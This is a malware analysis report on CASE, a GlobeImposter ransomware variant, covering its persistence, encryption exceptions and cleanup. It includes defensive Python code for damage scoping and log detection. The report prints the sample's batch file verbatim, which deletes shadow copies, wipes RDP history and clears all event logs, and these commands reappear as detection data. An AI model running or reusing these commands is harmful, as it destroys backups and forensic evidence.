Analysis of CASE, the Latest Variant of the GlobeImposter Family
1 Sample Overview

Recently, researchers from Huawei Weiran Labs captured a new ransomware sample. Analysis shows that the sample's behavior is almost identical to that of samples of the GlobeImposter ransomware family, and a comparison of the sample's code with code of GlobeImposter samples from 2018 shows a code similarity above 80%. The sample's compilation timestamp is February 2, 2019, from which it can be determined that the sample is the latest variant of the GlobeImposter family.

The GlobeImposter ransomware family was first discovered in May 2017, and several large-scale outbreaks have been observed since then. Extensions given to encrypted files by earlier versions of the family include .CHAK, .crypted!, .dream, .TRUE, .doc, .Tiger4444 and Ox4444. The family uses RSA+AES encryption to encrypt files, and no organization has yet announced an effective decryption tool for it.

After the sample runs, it copies itself to the system directory and creates a startup item. It then traverses the device's drives and encrypts files for ransom. Encrypted files are given the suffix .CASE, and a ransom note named how_to_back_files.html is dropped in the folder of each encrypted file. After encryption is completed, a batch file is dropped that clears the records of logins from the local device to remote devices and deletes the local logs. After execution is completed, the sample deletes itself.

The ransom message displayed after the files are encrypted does not state the price of restoring the files; instead it provides e-mail addresses through which the victim can ask for the price of file recovery.

The content of the ransom note how_to_back_files.html is as follows:

The diagnosis result of the sample from the HUAWEI sandbox product is as follows:

2 IOC
3 Sample Collection

We first analyzed the processes of an infected device and found no suspicious process. After restarting the device, a temporarily created file was found to be encrypted, and a process named svchost.exe running from a non-system directory was found. The suspicious file was not found in the process's image file directory, and after rebooting once more, newly created files were no longer encrypted. Analysis of the startup items of another infected device that had not yet been restarted revealed a suspicious value under the RunOnce startup key; the image path of that value is identical to that of the suspicious process found on the first infected device. After the sample was collected into the experimental environment, analysis confirmed that it is the ransomware sample.

4 Sample Analysis

The sample has simple functionality and a clear attack flow. The main execution flow diagram is as follows:

4.1 Environment Initialization

After the malicious code is executed, the key for encrypting files is generated and the data used during the encryption process is decrypted. The decrypted data includes the suffix for encrypted files, a whitelist of files that are not encrypted, the name of the ransom note, and so on.
There are a total of 43 whitelisted names that the sample does not encrypt. The list is as follows:

Windows, Microsoft, Microsoft Help, Windows App Certification Kit, Windows Defender, ESET, COMODO, Windows NT, Windows Kits, Windows Mail, Windows Media Player, Windows Multimedia Platform, Windows Phone Kits, Windows Phone Silverlight Kits, Windows Photo Viewer, Windows Portable Devices, Windows Sidebar, WindowsPowerShell, NVIDIA Corporation, Microsoft.NET, Internet Explorer, Kaspersky Lab, McAfee, Avira spytech software, sysconfig, Avast, Dr.Web, Symantec, Symantec_Client_Security, system volume information, AVG, Microsoft Shared, Common Files, Outlook Express, Movie Maker, Chrome, Mozilla, Firefox, Opera, YandexBrowser, ntldr, Wsus, ProgramData

Analysis of the whitelist shows that it contains the names of Microsoft system software folders and of some antivirus software folders, as well as the folder name of a Russian browser (YandexBrowser), from which it is supposed that the sample's developer is likely a Russian-speaking actor.
The string decryption disassembly code is as follows:

    .rdata:00409CED  push    edi                         ; hFile
    .rdata:00409CEE  push    20h                         ; int
    .rdata:00409CF0  push    dword_40CA9C                ; int
    .rdata:00409CF6  mov     esi, offset suffix_str
    .rdata:00409CFB  push    30h                         ; int
    .rdata:00409CFD  push    esi                         ; int
    .rdata:00409CFE  call    decode_str
    .rdata:00409D03  push    edi                         ; hFile
    .rdata:00409D04  push    20h                         ; int
    .rdata:00409D06  push    dword_40CA9C                ; int
    .rdata:00409D0C  push    30h                         ; int
    .rdata:00409D0E  push    offset report_name_str      ; int
    .rdata:00409D13  call    decode_str
    .rdata:00409D18  push    edi                         ; CodePage
    .rdata:00409D19  push    esi                         ; lpMultiByteStr
    .rdata:00409D1A  call    sub_409408
    .rdata:00409D1F  push    290h                        ; int
    .rdata:00409D24  push    dword_40CA9C                ; int
    .rdata:00409D2A  mov     dword_40CAA8, eax
    .rdata:00409D2F  push    offset dword_40CAAC         ; int
    .rdata:00409D34  push    offset except_suffix_str    ; lpString
    .rdata:00409D39  call    decode_except_str
    .rdata:00409D3E  push    110h                        ; int
    .rdata:00409D43  push    dword_40CA9C                ; int
    .rdata:00409D49  mov     dword_40CAB0, eax
    .rdata:00409D4E  push    offset dword_40C648         ; int
    .rdata:00409D53  push    offset except_folder_str    ; lpString
    .rdata:00409D58  call    decode_except_str

4.2 Copy Itself and Create a Startup Item

After the sample runs, it copies itself to the system directory and creates a startup item. Because the startup item is created under the RunOnce key, the sample is only executed again after a restart, and because the sample has a self-delete function, it is gone once the device has been restarted.
The startup item created by the sample is as follows:

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
    "BrowserUpdateCheck"="C:\\Users\\Administrator\\AppData\\Local\\svchost.exe"

The disassembly code of "copy file and create a startup item" is as follows:

    .rdata:00409DCA  push    edi                         ; bFailIfExists
    .rdata:00409DCB  push    esi                         ; lpNewFileName
    .rdata:00409DCC  push    lpMem                       ; lpExistingFileName
    .rdata:00409DD2  call    CopyFileW
    .rdata:00409DD8  test    eax, eax
    .rdata:00409DDA  jz      short loc_409DE2
    .rdata:00409DDC
    .rdata:00409DDC  loc_409DDC:                         ; CODE XREF: sub_409C6B+15Dj
    .rdata:00409DDC  push    esi                         ; lpString2
    .rdata:00409DDD
    .rdata:00409DDD  loc_409DDD:                         ; CODE XREF: sub_409C6B+154j
    .rdata:00409DDD  call    create_reg_runonce

4.3 Create an Encryption Key Backup File

The ransomware writes a file containing the key data used in the encryption process to the system directory. The file is stored at the following location:

    C:\Users\Public\2946ED3ED6B1BB3BBC379EFB70E753162A8C2483FA2271873F22EE6FAECE1AF1

The file content may be as follows:

    8021F4619DEE61582FD12ACEA1CB4FB7F8BA1D82315758F1141F756269D85599414493C1539ED9FEDEAE53772DBEDF19697916535FE8CEBB525
    E98ADEA50AF4AEFFC7641E723276EEB739F7894688343F595D563025F39F3B3DE6E927DE4B65E95A6F562D05F58A6584811612B208A5053304E
    079A75841EEE6C9DE839186843

    6F 23 EA E0 97 B4 4D EB 67 DE 34 33 7F F6 8A 67
    47 85 C4 AF 22 9D 3A 81 A9 20 B2 10 A5 87 2F B0
    D2 B5 AB 43 D0 AA 43 59 4C BE DE 23 38 89 53 66
    E1 2C ED 87 4B 41 E3 F2 9A E9 9C 51 85 36 AB 91
    4F BD 47 05 3C 2A D9 23 EB 4E BD B9 71 4C A7 6A
    5B C5 72 CB AD 20 5D 5D 91 56 6E 20 C4 00 C7 1E
    D8 81 2E 81 A1 4E 0B 4E 22 21 12 49 9B 6A A7 B8
    D8 80 71 C2 3F 50 50 CE 43 DF 51 D6 83 94 A8 A7
    03 B4 6B A9 5E BF 91 38 34 8A 5B 52 D7 19 E2 94
    97 25 3B 88 9F F3 21 A6 38 21 CA 8B AD 25 CC 9C
    8E 98 56 14 57 5F 95 42 CC 26 B3 61 8A 17 E8 E5
    2D 96 81 72 D3 42 26 A9 1D 2B 05 7A 2D BF 8F C0
    21 A8 10 EE B4 14 A6 82 5F A8 BE 23 13 BD 00 82
    86 A9 AA 86 73 16 FD 20 F2 9A 42 77 DE E9 0C E0
    14 BD 96 21 4F 49 A0 E5 B8 0D 00 D8 D3 DC 13 2A
    79 2E D2 6A B8 37 4C B1 5A DD 7D EB 1F F6 AF AF

The disassembly code of "create a key file" is as follows:

    .rdata:00409DF4  push    esi                         ; nSize
    .rdata:00409DF5  push    edi                         ; lpBuffer
    .rdata:00409DF6  push    offset aPublic              ; "public"
    .rdata:00409DFB  call    ebx                         ; GetEnvironmentVariableW
    ……
    .rdata:00409E97  push    ebx                         ; lpFileName
    .rdata:00409E98  call    create_key_file

4.4 Traverse Drives and Encrypt Files

When the ransomware encrypts files on drives, it checks the drive type and encrypts only removable drives, fixed drives and network drives. In addition, unlike other ransomware programs that encrypt only files with specified suffixes, the new variant encrypts all files on the drives of the local device, with the following exceptions:

Exception 1: The ransom note named how_to_back_files.html is not encrypted.
Exception 2: The key file saved by the virus is not encrypted; its file name is 2946ED3ED6B1BB3BBC379EFB70E753162A8C2483FA2271873F22EE6FAECE1AF1.
Exception 3: The currently running ransomware file itself is not encrypted.
Exception 4: A file whose last five bytes are .CASE is not encrypted.
Exception 5: Files under the 43 whitelisted directories are not encrypted.
Exception 6: Files with a size of 0 are not encrypted.
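The six exceptions above, together with the 43 whitelisted folder names from section 4.1, tell a responder exactly which files on an infected host are expected to be intact and which artefacts to look for when sizing the damage. The following scoping scanner is an added example written for this report, not code from the original analysis or from the sample: it walks a directory tree, labels every file (encrypted, ransom note, key backup file, left alone because empty or under a whitelisted folder, or untouched) and counts the results. The suffix comparison is case-insensitive, matching the sample's lstrcmpiA-based check; treating a file as whitelisted when any directory on its path carries one of the 43 names is a simplification assumed here, and the directory tree built by build_demo_tree() is constructed for the example.

```python
import os
import shutil
import tempfile
from collections import Counter

# Indicators taken from the report: encrypted-file suffix (4.4, exception 4),
# ransom note name (exception 1) and key backup file name (4.3, exception 2).
ENCRYPTED_SUFFIX = ".CASE"
RANSOM_NOTE = "how_to_back_files.html"
KEY_FILE = "2946ED3ED6B1BB3BBC379EFB70E753162A8C2483FA2271873F22EE6FAECE1AF1"

# The 43 whitelisted folder names decrypted by the sample (4.1), lower-cased so
# the comparison is case-insensitive like the sample's lstrcmpiA call.
WHITELIST = {name.lower() for name in (
    "Windows", "Microsoft", "Microsoft Help", "Windows App Certification Kit",
    "Windows Defender", "ESET", "COMODO", "Windows NT", "Windows Kits", "Windows Mail",
    "Windows Media Player", "Windows Multimedia Platform", "Windows Phone Kits",
    "Windows Phone Silverlight Kits", "Windows Photo Viewer", "Windows Portable Devices",
    "Windows Sidebar", "WindowsPowerShell", "NVIDIA Corporation", "Microsoft.NET",
    "Internet Explorer", "Kaspersky Lab", "McAfee", "Avira spytech software", "sysconfig",
    "Avast", "Dr.Web", "Symantec", "Symantec_Client_Security", "system volume information",
    "AVG", "Microsoft Shared", "Common Files", "Outlook Express", "Movie Maker", "Chrome",
    "Mozilla", "Firefox", "Opera", "YandexBrowser", "ntldr", "Wsus", "ProgramData",
)}


def classify(path, size, root):
    """Label one file for the damage report; the order follows the exceptions in 4.4."""
    name = os.path.basename(path)
    if name == RANSOM_NOTE:
        return "ransom_note"
    if name == KEY_FILE:
        return "key_file"
    if name[-5:].lower() == ENCRYPTED_SUFFIX.lower():   # "last five bytes are .CASE"
        return "encrypted"
    # Simplification (assumption of this example): a file counts as whitelisted when
    # any directory on its path below the scan root carries one of the 43 names.
    rel_dirs = os.path.relpath(os.path.dirname(path), root).split(os.sep)
    if any(d.lower() in WHITELIST for d in rel_dirs):
        return "whitelisted_dir"
    if size == 0:                                        # exception 6
        return "empty"
    return "untouched"


def scope_tree(root):
    """Walk `root`; return ({label: count}, sorted folders that hold a ransom note)."""
    counts = Counter()
    note_dirs = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            label = classify(full, os.path.getsize(full), root)
            counts[label] += 1
            if label == "ransom_note":
                note_dirs.append(os.path.relpath(dirpath, root))
    return dict(counts), sorted(note_dirs)


def build_demo_tree(root):
    """Constructed sample tree (not from a real infection) exercising every label."""
    files = {
        "Documents/report.docx.CASE": b"ciphertext-placeholder",
        "Documents/budget.xlsx.case": b"ciphertext-placeholder",  # lower-case suffix
        "Documents/" + RANSOM_NOTE: b"<html>ransom note</html>",
        "Documents/empty.txt": b"",                                # exception 6
        "Documents/todo.txt": b"still readable",
        "Public/" + KEY_FILE: b"8021F4619DEE",                     # exception 2
        "ProgramData/app.log": b"skipped: whitelisted folder",     # exception 5
        "Windows/System32/drivers/etc/hosts": b"127.0.0.1 localhost",
    }
    for rel, data in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)


def demo():
    """Build the constructed tree in a temp dir, scan it and clean up."""
    root = tempfile.mkdtemp(prefix="case_scope_")
    try:
        build_demo_tree(root)
        return scope_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    counts, note_dirs = demo()
    print(counts)
    print("folders containing a ransom note:", note_dirs)
```

Pointing scope_tree() at a mounted image of an infected drive gives a count of encrypted files per label and the list of folders that received a note; folders without a note but with .CASE files, or .CASE files under a whitelisted folder, would indicate a variant that deviates from the behaviour documented here.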
The disassembly code of "traverse system drives" is as follows:

    .rdata:004099FD  push    eax                         ; lpRootPathName
    .rdata:004099FE  call    GetDriveTypeA
    .rdata:00409A04  cmp     eax, 3
    .rdata:00409A07  jz      short loc_409A13
    .rdata:00409A09  cmp     eax, 2
    .rdata:00409A0C  jz      short loc_409A13
    .rdata:00409A0E  cmp     eax, 4
    .rdata:00409A11  jnz     short loc_409A3C

The drive types are defined as below (the three GetDriveType return values the code accepts, per the Windows API): 2 = DRIVE_REMOVABLE, 3 = DRIVE_FIXED, 4 = DRIVE_REMOTE.

The disassembly code of the file name checks for exception 1 to exception 3 is as follows:

    .rdata:0040987C  lea     eax, [esp+25B4h+FindFileData.cFileName]
    .rdata:00409880  push    eax                         ; lpString1
    .rdata:00409881  call    esi                         ; lstrcmpiW
    .rdata:00409883  test    eax, eax
    .rdata:00409885  jz      loc_409942
    .rdata:0040988B  push    lpString2                   ; lpString2
    .rdata:00409891  lea     eax, [esp+25B4h+FindFileData.cFileName]
    .rdata:00409895  push    eax                         ; lpString1
    .rdata:00409896  call    esi                         ; lstrcmpiW
    .rdata:00409898  test    eax, eax
    .rdata:0040989A  jz      loc_409942
    .rdata:004098A0  push    lpMem                       ; pszPath
    .rdata:004098A6  call    PathFindFileNameW
    .rdata:004098AC  push    eax                         ; lpString2
    .rdata:004098AD  lea     eax, [esp+25B4h+FindFileData.cFileName]
    .rdata:004098B1  push    eax                         ; lpString1
    .rdata:004098B2  call    esi                         ; lstrcmpiW

The disassembly code of the suffix and whitelist checks for exception 4 and exception 5 is as follows:

    .rdata:00409284  loop_match:                         ; CODE XREF: sub_40923F+8Dj
    .rdata:00409284  push    [esp+14h+lpString]          ; lpString
    .rdata:00409288  call    lstrlenA
    .rdata:0040928E  push    dword ptr [edi+ebx*4]       ; lpString
    .rdata:00409291  mov     esi, eax
    .rdata:00409293  call    lstrlenA
    .rdata:00409299  cmp     esi, eax
    .rdata:0040929B  jl      short loc_4092C9
    .rdata:0040929D  mov     esi, [edi+ebx*4]
    .rdata:004092A0  push    esi                         ; lpString
    .rdata:004092A1  call    lstrlenA
    .rdata:004092A7  mov     edi, [esp+14h+lpString]
    .rdata:004092AB  push    esi                         ; lpString2
    .rdata:004092AC  push    [esp+18h+lpString]          ; lpString
    .rdata:004092B0  sub     edi, eax
    .rdata:004092B2  call    lstrlenA
    .rdata:004092B8  add     eax, edi
    .rdata:004092BA  push    eax                         ; lpString1
    .rdata:004092BB  call    lstrcmpiA
    .rdata:004092C1  test    eax, eax
    .rdata:004092C3  jz      short match_white_list
    .rdata:004092C5  mov     edi, [esp+14h+var_4]
    .rdata:004092C9
    .rdata:004092C9  loc_4092C9:                         ; CODE XREF: sub_40923F+5Cj
    .rdata:004092C9  inc     ebx
    .rdata:004092CA  cmp     ebx, ebp
    .rdata:004092CC  jb      short loop_match

The disassembly code of the empty file check for exception 6 is as follows:

    .rdata:00408DDD  push    ebx                         ; hTemplateFile
    .rdata:00408DDE  push    80000000h                   ; dwFlagsAndAttributes
    .rdata:00408DE3  push    3                           ; dwCreationDisposition
    .rdata:00408DE5  push    ebx                         ; lpSecurityAttributes
    .rdata:00408DE6  push    ebx                         ; dwShareMode
    .rdata:00408DE7  push    0C0000000h                  ; dwDesiredAccess
    .rdata:00408DEC  push    [esp+1B8h+lpFileName]       ; lpFileName
    .rdata:00408DF3  call    CreateFileW
    .rdata:00408DF9  mov     ebx, eax
    .rdata:00408DFB  cmp     ebx, 0FFFFFFFFh
    .rdata:00408DFE  jz      next_loop
    .rdata:00408E04  lea     eax, [esp+1A0h+var_184]
    .rdata:00408E08  push    eax
    .rdata:00408E09  push    ebx
    .rdata:00408E0A  call    GetFileSizeEx
    .rdata:00408E10  test    eax, eax
    .rdata:00408E12  jz      next_loop
    .rdata:00408E18  mov     eax, dword ptr [esp+1A0h+var_184]
    .rdata:00408E1C  or      eax, dword ptr [esp+1A0h+var_184+4]
    .rdata:00408E20  jz      next_loop

4.5 Delete Data Backups and Remove Attack Traces

After the ransomware has traversed all drives and encrypted the files, it drops a batch file in the temporary directory. The batch file deletes the shadow copies, clears the records of logins from the local device to remote devices, and clears the device logs.
The content of the batch file is as follows:

    @echo off
    vssadmin.exe Delete Shadows /All /Quiet
    reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
    reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
    cd %userprofile%\documents\
    attrib Default.rdp -s -h
    del Default.rdp
    for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

In the batch file, the second line deletes the shadow copies, the third to eighth lines clear the records of logins from the local device to remote devices, and the last line clears all local event logs.

The disassembly code of "create and execute the batch file" is as follows:

    .rdata:00409463  push    esi                         ; lpBuffer
    .rdata:00409464  push    800h                        ; nBufferLength
    .rdata:00409469  call    GetTempPathW
    .rdata:0040946F  push    edi                         ; lpTempFileName
    .rdata:00409470  xor     ebx, ebx
    .rdata:00409472  push    ebx                         ; uUnique
    .rdata:00409473  push    offset PrefixString         ; "tmp"
    .rdata:00409478  push    esi                         ; lpPathName
    .rdata:00409479  call    GetTempFileNameW
    .rdata:0040947F  push    offset String2              ; ".bat"
    .rdata:00409484  push    edi                         ; lpString1
    .rdata:00409485  call    lstrcatW
    .rdata:0040948B  push    ebx                         ; hTemplateFile
    .rdata:0040948C  push    80h                         ; dwFlagsAndAttributes
    .rdata:00409491  push    2                           ; dwCreationDisposition
    .rdata:00409493  push    ebx                         ; lpSecurityAttributes
    .rdata:00409494  push    ebx                         ; dwShareMode
    .rdata:00409495  push    40000000h                   ; dwDesiredAccess
    .rdata:0040949A  push    edi                         ; lpFileName
    .rdata:0040949B  call    CreateFileW
    .rdata:004094A1  cmp     eax, 0FFFFFFFFh
    .rdata:004094A4  jz      short loc_4094C3
    .rdata:004094A6  push    eax                         ; hFile
    .rdata:004094A7  push    20h                         ; int
    .rdata:004094A9  push    offset byte_401124          ; int
    .rdata:004094AE  push    1D0h                        ; int
    .rdata:004094B3  push    offset dword_401358         ; int
    .rdata:004094B8  call    decode_str
    .rdata:004094BD  push    edi                         ; lpCommandLine
    .rdata:004094BE  call    run_bat

4.6 Self-delete

Before the ransomware program exits, it deletes itself through a batch command. The disassembly code of "create the self-delete command" is as follows:

    .rdata:0040957B  push    offset aCDel                ; "/c del "
    .rdata:00409580  push    eax                         ; lpString1
    .rdata:00409581  call    esi                         ; lstrcatW
    .rdata:00409583  lea     eax, [ebp+Filename]
    .rdata:00409589  push    eax                         ; lpString2
    .rdata:0040958A  lea     eax, [ebp+String1]
    .rdata:00409590  push    eax                         ; lpString1
    .rdata:00409591  call    esi                         ; lstrcatW
    .rdata:00409593  push    offset aNul                 ; " > nul"
    .rdata:00409598  lea     eax, [ebp+String1]
    .rdata:0040959E  push    eax                         ; lpString1
    .rdata:0040959F  call    esi                         ; lstrcatW
    .rdata:004095A1  lea     eax, [ebp+Buffer]
    .rdata:004095A7  mov     [ebp+ExecInfo.cbSize], 3Ch
    .rdata:004095AE  mov     [ebp+ExecInfo.lpFile], eax
    .rdata:004095B1  lea     eax, [ebp+String1]
    .rdata:004095B7  push    40h
    .rdata:004095B9  mov     [ebp+ExecInfo.lpParameters], eax
    .rdata:004095BC  lea     eax, [ebp+ExecInfo]
    .rdata:004095BF  pop     esi
    .rdata:004095C0  push    eax                         ; lpExecInfo
    .rdata:004095C1  mov     [ebp+ExecInfo.hwnd], edi
    .rdata:004095C4  mov     [ebp+ExecInfo.lpVerb], offset aOpen ; "Open"
    .rdata:004095CB  mov     [ebp+ExecInfo.lpDirectory], edi
    .rdata:004095CE  mov     [ebp+ExecInfo.nShow], edi
    .rdata:004095D1  mov     [ebp+ExecInfo.fMask], esi
    .rdata:004095D4  call    ShellExecuteExW

5 Summary

The sample has simple functionality and a clear purpose. In addition to encrypting the data on the infected device, it cleans up the device's remote login traces and log records. The sample has a self-delete function and creates a RunOnce startup item, so it is completely removed after the infected device is restarted; that is, after the infected device is restarted for the second time, its data is no longer encrypted.

6 Security Recommendations

Analysis shows that the sample is a member of the GlobeImposter family, compiled in February 2019. Many cases of infection by this ransomware have already been found and an outbreak of the ransomware attack is expected, so security personnel should take appropriate security measures to protect their key devices. Since the GlobeImposter family gains its foothold mainly by brute-forcing remote login passwords, you can effectively reduce the chance of being attacked by setting a high-complexity remote desktop login password, using different login passwords for different devices on the intranet, restricting the IP addresses allowed to log in remotely, and turning off unnecessary remote login services. If you need to collect the virus sample after being infected, do not restart or shut down the device; otherwise the virus sample will delete itself.
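The RunOnce persistence in 4.2, the cleanup batch file in 4.5 and the "/c del ... > nul" self-delete in 4.6 all leave process-creation and registry-write events that endpoint telemetry can catch, which complements the password and remote-access hardening recommended above. The following detection logic is an added example written for this report, not code from the original analysis or from any product: it runs five rules over a handful of constructed JSON event lines and then checks, per host, whether the full shadow-copy, RDP-history and event-log cleanup pattern of the batch file has been seen. The event format, its field names, the value of %SystemRoot% and the list of masqueraded binary names are assumptions of this example.

```python
import json
import ntpath

# Rule names correspond to behaviours documented in the report: RunOnce persistence
# masquerading as svchost.exe (4.2), the cleanup batch file (4.5) and the
# "/c del ... > nul" self-delete (4.6).
RUNONCE_KEY_FRAGMENT = "\\currentversion\\runonce"
MASQUERADED_NAMES = {"svchost.exe"}          # system binary names the sample borrows
WINDOWS_DIR_PREFIX = "c:\\windows\\"         # assumption: %SystemRoot% is C:\Windows
CLEANUP_PATTERN = {"shadow_copy_deletion", "rdp_history_wipe", "event_log_clearing"}

# Constructed telemetry (not from a real host): one benign svchost start, then the
# RunOnce write, the batch-file commands and the self-delete, in log order.
SAMPLE_LOG = [
    r'{"ts":"2019-04-01T08:00:01Z","host":"ws01","type":"process","image":"C:\\Windows\\System32\\svchost.exe","cmdline":"svchost.exe -k netsvcs"}',
    r'{"ts":"2019-04-01T08:00:05Z","host":"ws01","type":"registry","key":"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce","value":"BrowserUpdateCheck","data":"C:\\Users\\Administrator\\AppData\\Local\\svchost.exe"}',
    r'{"ts":"2019-04-01T08:12:40Z","host":"ws01","type":"process","image":"C:\\Windows\\System32\\vssadmin.exe","cmdline":"vssadmin.exe Delete Shadows /All /Quiet"}',
    r'{"ts":"2019-04-01T08:12:41Z","host":"ws01","type":"process","image":"C:\\Windows\\System32\\reg.exe","cmdline":"reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"}',
    r'{"ts":"2019-04-01T08:12:42Z","host":"ws01","type":"process","image":"C:\\Windows\\System32\\wevtutil.exe","cmdline":"wevtutil.exe el"}',
    r'{"ts":"2019-04-01T08:12:43Z","host":"ws01","type":"process","image":"C:\\Windows\\System32\\wevtutil.exe","cmdline":"wevtutil.exe cl \"Security\""}',
    r'{"ts":"2019-04-01T08:12:44Z","host":"ws01","type":"process","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c del C:\\Users\\Administrator\\AppData\\Local\\svchost.exe > nul"}',
]


def _image_name(path):
    """Lower-cased file name of a Windows path (ntpath works on any OS)."""
    return ntpath.basename(path.strip('"')).lower()


def check_process(ev):
    """Return a rule name for a process-creation event, or None."""
    image = _image_name(ev.get("image", ""))
    low = ev.get("cmdline", "").lower()
    tokens = low.split()
    if image == "vssadmin.exe" and "delete" in tokens and "shadows" in tokens:
        return "shadow_copy_deletion"
    if image == "reg.exe" and "delete" in tokens and "terminal server client" in low:
        return "rdp_history_wipe"
    if image == "wevtutil.exe" and tokens[1:2] == ["cl"]:   # "el" (enumerate) alone is benign
        return "event_log_clearing"
    if image == "cmd.exe" and "/c del " in low and "> nul" in low:
        return "self_delete_via_cmd"
    return None


def check_registry(ev):
    """Flag a RunOnce value whose image borrows a system binary name outside %SystemRoot%."""
    key = ev.get("key", "").lower()
    data = ev.get("data", "").strip('"')
    if RUNONCE_KEY_FRAGMENT not in key:
        return None
    if _image_name(data) in MASQUERADED_NAMES and not data.lower().startswith(WINDOWS_DIR_PREFIX):
        return "runonce_masquerading_system_binary"
    return None


def detect(lines):
    """Apply the rules to JSON event lines and return the hits in log order."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        rule = check_registry(ev) if ev.get("type") == "registry" else check_process(ev)
        if rule:
            hits.append({"ts": ev["ts"], "host": ev["host"], "rule": rule,
                         "evidence": ev.get("cmdline") or ev.get("data")})
    return hits


def summarize(hits):
    """Per host: the rules seen and whether the whole 4.5 cleanup pattern is present."""
    per_host = {}
    for h in hits:
        per_host.setdefault(h["host"], set()).add(h["rule"])
    return {host: {"rules": sorted(rules), "cleanup_batch_pattern": CLEANUP_PATTERN <= rules}
            for host, rules in per_host.items()}


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for h in found:
        print(h["ts"], h["host"], h["rule"], "<-", h["evidence"])
    print(summarize(found))
```

Each rule on its own is noisy in some environments (administrators do clear logs and delete shadow copies), which is why summarize() reports the combination: all three cleanup rules firing on one host within seconds, preceded by a RunOnce value pointing at an svchost.exe under a user profile, is the sequence this sample produces and is worth an immediate isolation of the host.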
brunoftr 2019-04-04 07:10:54 Hello, we were attacked by this ransomware in our company and we have a server that is stopped. Would you already have some descriptor for this virus?